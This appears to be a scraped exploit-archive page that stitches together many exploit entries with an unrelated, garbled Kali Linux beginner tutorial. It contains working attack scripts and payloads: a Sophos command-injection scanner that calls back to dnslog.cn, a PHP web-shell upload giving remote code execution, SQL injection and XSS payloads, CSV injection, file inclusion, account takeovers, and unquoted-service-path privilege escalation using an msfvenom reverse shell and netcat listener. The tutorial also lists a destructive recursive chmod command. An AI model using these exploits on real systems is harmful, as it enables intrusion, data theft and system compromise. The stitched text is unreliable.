LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe [4] Upload the reverse shell to C:\Program Files (x86)\Common.exe > put Commom.exe > ls drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 . drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .. drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files -rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 InstallShield Installation Information drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "ADExchange" > sc start "ADExchange" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
HireHackking

Sophos Web Appliance 4.3.10.4 - Pre-auth command injection

HACKER · %s · %s

#!/bin/bash # Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection # Exploit Author: Behnam Abasi Vanda # Vendor Homepage: https://www.sophos.com # Version: Sophos Web Appliance older than version 4.3.10.4 # Tested on: Ubuntu # CVE : CVE-2023-1671 # Shodan Dork: title:"Sophos Web Appliance" # Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce # Reference : https://vulncheck.com/blog/cve-2023-1671-analysis TARGET_LIST="$1" # ===================== BOLD="\033[1m" RED="\e[1;31m" GREEN="\e[1;32m" YELLOW="\e[1;33m" BLUE="\e[1;34m" NOR="\e[0m" # ==================== get_new_subdomain() { cat MN.txt | grep 'YES' >/dev/null;ch=$? if [ $ch -eq 0 ];then echo -e " [+] Trying to get Subdomain $NOR" rm -rf cookie.txt sub=`curl -i -c cookie.txt -s -k -X $'GET' \ -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \ $'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn` echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR" fi } check_vuln() { curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)" req=`curl -i -s -k -b cookie.txt -X $'GET' \ -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \ $'http://www.dnslog.cn/getrecords.php?t=0'` echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$? if [ $ch -eq 0 ];then echo "YES" > MN.txt echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR" echo "https://$1" >> vulnerable.lst else echo -e " [-] https://$1 Not Vulnerable :| $NOR" echo "NO" > MN.txt fi } echo ' ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗ ██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗ ██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║ ██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║ ██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝ ╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ' if test "$#" -ne 1; then echo " ----------------------------------------------------------------" echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt " echo " ---------------------------------------------------------------" exit fi rm -rf cookie.txt echo "YES" > MN.txt for target in `cat $TARGET_LIST` do get_new_subdomain; echo " [~] Checking $target" check_vuln "$target" done rm -rf MN.txt rm -rf cookie.txt
HireHackking
# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS) # Google Dork: None # Date: 4/26/2023 # Exploit Author: Or4nG.M4n # Vendor Homepage: https://github.com/jcwebhole # Software Link: https://github.com/jcwebhole/php_restaurants # Version: 1.0 functions.php function login(){ global $conn; $email = $_POST['email']; $pw = $_POST['password']; $sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = '".md5($pw)."'"; <-- there is No filter to secure sql query parm[email][password] $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day header('location: index.php'); } } else { header('location: login.php?m=Wrong Password'); } } login bypass at admin page /rest1/admin/login.php email & password : ' OR 1=1 -- <- add [space] end of the payload cross site scripting main page /index.php xhttp.open("GET", "functions.php?f=getRestaurants<?php if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we can insert our xss payload ?> ", true); xhttp.send(); </script> <-- when you insert your'e payload don't forget to add </script> like xss payload : </script><img onerror=alert(1) src=a>
HireHackking

admidio v4.2.5 - CSV Injection

HACKER · %s · %s

Exploit Title: admidio v4.2.5 - CSV Injection Application: admidio Version: 4.2.5 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.admidio.org/ Software Link: https://www.admidio.org/download.php Date of found: 26.04.2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2) step 3. If admin Export users as CSV or excell file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2) payload: =calc|a!z| Poc video: https://www.youtube.com/watch?v=iygwj1izSMQ
HireHackking

SoftExpert (SE) Suite v2.1.3 - Local File Inclusion

HACKER · %s · %s

# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion # Date: 27-04-2023 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.softexpert.com/ # Version: 2.0 < 2.1.3 # Tested on: Kali Linux # CVE : CVE-2023-30330 # SE Suite versions tested: 2.0.15.31, 2.0.15.115 # https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330 #!/bin/bash # Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> target=$1 u=$2 p=$3 file=$(echo -n "$4"|base64 -w 0) end="\033[0m\e[0m" red="\e[0;31m\033[1m" blue="\e[0;34m\033[1m" echo -e "\n$4 : $file\n" echo -e "${blue}\nGETTING SESSION COOKIE${end}" cookie=$(curl -i -s -k -X $'POST' \ -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \ -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \ --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \ "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2) echo "cookie: $cookie" function LFI () { curl -s -k -X $'POST' \ -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \ -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \ --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \ "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php" } echo -e "${blue}\nExploiting LFI:${end}" LFI function logout () { curl -i -s -k -X $'POST' \ -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \ -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \ "https://$target/softexpert/selogout" } echo -e "${blue}\nLogging out${end}" logout >/dev/null echo -e "\n\nDone!"
HireHackking

Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) # Date: 2023-04-02 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html # Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip # Version: 1.0 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-29848 *Steps to Reproduce:* 1. First login to your admin panel. 2. then go to Menu section and click add new menu from group. your request data will be: POST /bangresto/admin/menu.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 87 Origin: http://127.0.0.1 Referer: http://127.0.0.1/bangresto/admin/menu.php Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6 Connection: close itemName=test&itemPrice=1&menuID=1&addItem= 3. Then use any XSS Payload in "itemName" parameter and click add. 4. You will see XSS pop up.
HireHackking

Title: Getting Started with Kali Linux Newbie

HACKER · %s · %s

Preface
This article is about a friend who is just studying kali. This article will start from the following aspects: the command, artifact, penetration test, and three aspects. If there are any other aspects that are not involved, please leave a message below for my convenience! The original work of this article is Xiaoyaozi. If you need to reprint it, please contact the author first. You can only reprint it after agreeing. At the same time, you can join the QQ communication group: (618207388) or follow the WeChat public account kali hacker teaching or kali forum to update simultaneously!
What is kali linux
Kali is a Debian-based Linux distribution. Its goal is to simplify: include as many penetration and audit tools as possible in a practical toolkit. Kali Linux is an open source project that is maintained and funded by Offensive Security, a provider of world-class information security training and penetration testing services.

kali installation
USB disk installation virtual machine installation (recommended) Physical machine installation Raspberry Pi (a superior device in the world of pretending)
kali installation (vm) configuration
Memory 2G (minimum) hard disk (20-40G) wireless network card (recommended 8187) processor 4 cores
kali can install graphical interfaces or use only command line interfaces. According to your actual situation, if your device is relatively high-end, it is recommended to install a graphical interface. If the device is not high-end, it is recommended to install a command interface such as Raspberry Pi. Otherwise the graphical interface will take up a lot of resources. It should be noted that in Kali, the two interfaces can be switched to each other.
Reference article: Switching of kalilinux's graphical interface and text interface
Switch files of kalilinux's graphical interface and text interface to modify whether the graphics configuration is enabled: the file that configures the graphical line interface is vi /etc/def.
It should be noted that the default username of kali is root password is goor
kali Commands

File Operation
Copy Move Delete
Copy the file
cp /root/123.txt /var/www Copy 123.txt in the root directory to the /var/www directory.
Move files
mv /root/123.txt /var/www delete file
rm 123.txtps: Delete the entire file under folder 123
rm -rf 123
Change paths and create folders
View the current path
pwd switch directory
cd /var/www create folder
mkdir hacker
Text Operation
View File
cat
The most commonly used cat command is. Note that if the file is large, the output result of the cat command will be output on the terminal crazily. You can press ctrl+c multiple times to terminate.
View file size
du -h file
View file content
cat file Since cat has this problem, for larger files, we can use the less command to open a file.
Similar to vim, less can enter the search mode after input/, and then press n(N) to search down (upper).
There are many operations, all similar to vim, you can take a look at it in an analogy. tail
Most students who do server development understand this command. For example, check nginx's scrolling log.
tail -f access.logtail command can statically view the last n lines of a file, and correspondingly, the head command can view the n lines of the file header. But the head does not have a scrolling function, just like the tail is growing outward and will not grow inward.
tail -n100 access.log
head -n100 access.log
Other
grep
grep is used to filter the content, with the --color parameter, which can print colors at the supported terminal, and the parameter n outputs the specific number of lines for quick positioning.
For example: Check the POST request in nginx log.
grep -rn --color POST access.log recommends using such parameters every time.
If I want to see the relevant content before and after an exception, I can use the ABC parameter. They are abbreviations for several words and are often used.
A after content n lines
B before content n lines
C count? N lines before and after content
It's like this:
grep -rn --color Exception -A10 -B2 error.logdiff
The diff command is used to compare the differences between two files. Of course, this function is provided in the ide, and diff is just the original tradeoff under the command line. By the way, diff and patch are also patching methods for some platform source code. If you don’t use it, just pass it.

Compression and decompression command
In order to reduce the size of the transferred file, compression is generally enabled. Common compressed files under Linux include tar, bzip2, zip, rar, etc. 7z is used relatively rarely.
tar compress or decompress bz2 using the tar command operate gz using the gzip command operate zip using the unzip command decompress rar use the unrar command to decompress
The most commonly used file format is the .tar.gz file format. In fact, it is after tar package and then compressed using gzip.
Create a compressed file
tar cvfz archive.tar.gz dir/
Decompression
tar xvfz. archive.tar.gz

Other common commands
chown
chown Used to change the user and group of files. chmod is used to change the access permissions of files.
Both commands are related to linux's file permissions 777.
Example:
Destructive Command
chmod 000 -R/Modify the user and group of directory a to xjj
chown -R xjj:xjj a adds execution permissions to a.sh file (this is too common)
chmod a+x a.shyum
Assuming you are using centos, the package management tool is yum. If your system does not have a wget command, you can use the following command to install it.
yum install wget -ysystemctl
Of course, there are some tricks to manage the backend service in centos. The service command is. Systemctl is compatible with service commands. Let's take a look at how to restart mysql service. Recommended to use the following.
service mysql restart
systemctl restart mysqld For ordinary processes, you need to use the kill command for more detailed control. There are many signals for kill command. If you are using kill -9, you must want to understand the differences and uses of kill -15 and kill -3. su
su is used to switch users. For example, if you are root now and want to use xjj users to do some activities, you can use su to switch.
su xjj
su - xjj
HireHackking
#!/usr/bin/env python3 # Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE) # Date: 09/04/2023 # Exploit Author: Matisse Beckandt (Backendt) # Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip # Version: 1.0 # Tested on: Debian 11.6 # CVE : CVE-2023-1826 # Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution. import requests from argparse import ArgumentParser from uuid import uuid4 from datetime import datetime, timezone def interactiveShell(fileUrl: str): print("Entering pseudo-shell. Type 'exit' to quit") while True: command = input("\n$ ") if command == "exit": break response = requests.get(f"{fileUrl}?cmd={command}") print(response.text) def uploadFile(url: str, filename: str, content): endpoint = f"{url}/classes/SystemSettings.php?f=update_settings" file = {"img": (filename, content)} response = requests.post(endpoint, files=file) return response def getUploadedFileUrl(url: str, filename: str): timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes epoch = int(timeNow.timestamp()) # Time in milliseconds possibleFilename = f"{epoch}_{filename}" fileUrl = f"{url}/uploads/{possibleFilename}" response = requests.get(fileUrl) if response.status_code == 200: return fileUrl def exploit(url: str): filename = str(uuid4()) + ".php" content = "<?php system($_GET['cmd'])?>" response = uploadFile(url, filename, content) if response.status_code != 200: print(f"[File Upload] Got status code {response.status_code}. Expected 200.") uploadedUrl = getUploadedFileUrl(url, filename) if uploadedUrl == None: print("Error. Could not find the uploaded file.") exit(1) print(f"Uploaded file is at {uploadedUrl}") try: interactiveShell(uploadedUrl) except KeyboardInterrupt: pass print("\nQuitting.") def getWebsiteURL(url: str): if not url.startswith("http"): url = "http://" + url if url.endswith("/"): url = url[:-1] return url def main(): parser = ArgumentParser(description="Exploit for CVE-2023-1826") parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/") args = parser.parse_args() url = getWebsiteURL(args.url) exploit(url) if __name__ == "__main__": main()
HireHackking

Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing

HACKER · %s · %s

## Title: Microsoft-Edge-(Chromium-based)-Webview2-1.0.1661.34-Spoofing-Vulnerability ## Author: nu11secur1ty ## Date: 04.10.2023 ## Vendor: https://developer.microsoft.com/en-us/ ## Software: https://developer.microsoft.com/en-us/microsoft-edge/webview2/ ## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/ ## CVE ID: CVE-2023-24892 ## Description: The Webview2 development platform is vulnerable to Spoofing attacks. The attacker can build a very malicious web app and spread it to the victim's networks. and when they open it this can be the last web app opening for them. STATUS: HIGH Vulnerability [+]Exploit: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892/PoC) ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892) ## Proof and Exploit: [href](https://streamable.com/uk7l2n) ## Time spend: 03:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

Bludit 4.0.0-rc-2 - Account takeover

HACKER · %s · %s

## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover ## Author: nu11secur1ty ## Date: 04.11.2013 ## Vendor: https://www.bludit.com/ ## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2 ## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/ ## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit ## Description: The already authenticated attacker can send a normal request to change his password and then he can use the same JSON `object` and the vulnerable `API token KEY` in the same request to change the admin account password. Then he can access the admin account and he can do very malicious stuff. STATUS: HIGH Vulnerability [+]Exploit: ```PUT PUT /api/users/admin HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 138 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36 content-type: application/json Accept: */* Origin: http://127.0.0.1:8000 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8000/admin/edit-user/pwned Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui Connection: close {"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"} ``` [+]Response: ```HTTP HTTP/1.1 200 OK Host: 127.0.0.1:8000 Date: Tue, 11 Apr 2023 08:33:51 GMT Connection: close X-Powered-By: PHP/7.4.30 Access-Control-Allow-Origin: * Content-Type: application/json {"status":"0","message":"User edited.","data":{"key":"admin"}} ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2) ## Proof and Exploit: [href](https://streamable.com/w3aa4d) ## Time spend: 00:57:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

Mars Stealer 8.3 - Admin Account Takeover

HACKER · %s · %s

# Exploit Title: Mars Stealer 8.3 - Admin Account Takeover # Product: Mars Stelaer # Technology: PHP # Version: < 8.3 # Google Dork: N/A # Date: 20.04.2023 # Tested on: Linux # Author: Sköll - twitter.com/s_k_o_l_l import argparse import requests parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit') parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/') args = parser.parse_args() url = args.url.rstrip('/') + '/includes/settingsactions.php' headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"} data = {"func": "savepwd", "pwd": "sköll"} #change password response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print("Succesfull!") print("New Password: " + data["pwd"]) else: print("Exploit Failed!")
HireHackking

Wondershare Filmora 12.2.9.2233 - Unquoted Service Path

HACKER · %s · %s

############################################################################ # # # Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path # # Date: 2023/04/23 # # Exploit Author: msd0pe # # Vendor Homepage: https://www.wondershare.com # # My Github: https://github.com/msd0pe-1 # # # ############################################################################ Wondershare Filmora: Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto [2] Get informations about the service: > sc qc "NativePushService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NativePushService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Native Push Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe [4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe > put Wondershare.exe > ls drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 . drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .. drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush -rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "NativePushService" > sc start "NativePushService" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
HireHackking

projectSend r1605 - Private file download

HACKER · %s · %s

Exploit Title: projectSend r1605 - Private file download Application: projectSend Version: r1605 Bugs: IDOR Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 24-01-2023 Author: Mirabbas Ağalarov Tested on: Linux Technical Details & POC ======================================== 1.Access to private files of any user, including admin just change id GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1 Host: localhost sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/manage-files.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f Connection: close
HireHackking

phpMyFAQ v3.1.12 - CSV Injection

HACKER · %s · %s

Exploit Title: phpMyFAQ v3.1.12 - CSV Injection Application: phpMyFAQ Version: 3.1.12 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.phpmyfaq.de/ Software Link: https://download.phpmyfaq.de/phpMyFAQ-3.1.12.zip Date of found: 21.04.2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to user control panel and change name as =calc|a!z| and save step 3. If admin Export users as CSV ,in The computer of admin occurs csv injection and will open calculator payload: calc|a!z| Poc video: https://youtu.be/lXwaexX-1uU
HireHackking

